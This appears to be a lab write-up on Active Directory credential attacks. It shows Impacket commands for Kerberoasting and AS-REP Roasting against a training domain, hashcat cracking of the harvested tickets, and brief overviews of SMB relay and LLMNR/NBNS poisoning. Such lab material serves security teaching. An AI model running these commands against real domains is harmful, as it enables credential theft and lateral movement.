2024-08-31 01:07:22 +02:00

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Kerberoasting is a common AD attack to obtain AD tickets that helps with persistence. In order for this attack to work, an adversary must have access to SPN (Service Principal Name) accounts such as IIS User, MSSQL, etc. The Kerberoasting attack involves requesting a Ticket Granting Ticket (TGT) and Ticket Granting Service (TGS). This attack's end goal is to enable privilege escalation and lateral network movement. For more details about the attack, you can visit the THM Persisting AD room (Task 3).

Let's do a quick demo about the attack. First, we need to find an SPN account(s), and then we can send a request to get a TGS ticket. We will perform the Kerberoasting attack from the AttackBox using the GetUserSPNs.py python script. Remember to use the THM.red/thm account with Passw0rd! as a password.

Enumerating for SPN Accounts

user@machine$ python3.9 /opt/impacket/examples/GetUserSPNs.py -dc-ip THM.red/thm
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

ServicePrincipalName          Name     MemberOf  PasswordLastSet             LastLogon  Delegation
http/creds-harvestin.thm.red  svc-user            2022-06-04 00:15:18.413578  

The previous command is straightforward: we provide the Domain Controller IP address and the domain name\username. Then the GetUserSPNs script asks for the user's password to retrieve the required information.

The output revealed that we have an SPN account, svc-user. Once we find the SPN user, we can send a single request to get a TGS ticket for the srv-user user using the -request-user argument.

Requesting a TGS Ticket as SPN Account

user@machine$ python3.9 /opt/impacket/examples/GetUserSPNs.py -dc-ip THM.red/thm -request-user svc-user 
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

ServicePrincipalName          Name     MemberOf  PasswordLastSet             LastLogon  Delegation
http/creds-harvestin.thm.red  svc-user            2022-06-04 00:15:18.413578  

[-] CCache file is not found. Skipping...

Now, it is a matter of cracking the obtained TGS ticket using the HashCat tool using -m 13100 mode as follows,

Cracking the TGS Ticket using Hashcat

user@machine$ hashcat -a 0 -m 13100 spn.hash /usr/share/wordlists/rockyou.txt

Try replicating the steps against the attached VM by finding the SPN user and then performing the Kerberoasting attack. Once you have obtained the ticket, crack it and answer the question below.

AS-REP Roasting

AS-REP Roasting is the technique that enables the attacker to retrieve password hashes for AD users whose account options have been set to "Do not require Kerberos pre-authentication". This option relies on the old Kerberos authentication protocol, which allows authentication without a password. Once we obtain the hashes, we can try to crack it offline, and finally, if it is crackable, we got a password!

AS-REP Roasting

The attached VM has one of the AD users configured with the "Do not require Kerberos preauthentication" setting. Before performing the AS-REP Roasting, we need a list of domain accounts that should be gathered from the enumeration step. In our case, we created a users.lst list in the tmp directory. The following is the content of our list, which should be gathered during the enumeration process.


We will be using the Impacket Get-NPUsers script this time as follows,

Performing an AS-REP Roasting Attack against Users List

root@machine$ python3.9 /opt/impacket/examples/GetNPUsers.py -dc-ip thm.red/ -usersfile /tmp/users.txt
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] User thm doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User admin doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User bk-admin doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-user doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User thm-local doesn't have UF_DONT_REQUIRE_PREAUTH set

We specified the IP address of the domain controller with the -dc-ip argument and provided a list of domain users to check against. Once the tool finds the right user with no preauthentication configuration, it will generate the ticket.

Various cybersecurity and hacking tools also allow cracking the TGTs harvested from Active Directory, including Rubeus and Hashcat. Impacket GetNPUsers has the option to export tickets as John or hashcat format using the -format argument.

SMB Relay Attack

The SMB Relay attack abuses the NTLM authentication mechanism (NTLM challenge-response protocol). The attacker performs a Man-in-the-Middle attack to monitor and capture SMB packets and extract hashes. For this attack to work, the SMB signing must be disabled. SMB signing is a security check for integrity and ensures the communication is between trusted sources. 

We suggest checking the THM Exploiting AD room for more information about the SMB relay attack.

LLMNR/NBNS Poisoning

Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) help local network machines to find the right machine if DNS fails. For example, suppose a machine within the network tries to communicate with no existing DNS record (DNS fails to resolve). In that case, the machine sends multicast messages to all network machines asking for the correct address via LLMNR or NBT-NS.

The NBNS/LLMNR Poisoning occurs when an attacker spoofs an authoritative source on the network and responds to the Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) traffic to the requested host with host identification service. If you want to learn more about the attack, we suggest checking THM Breaching AD room.

The end goal for SMB relay and LLMNR/NBNS Poisoning attacks is to capture authentication NTLM hashes for a victim, which helps obtain access to the victim's account or machine.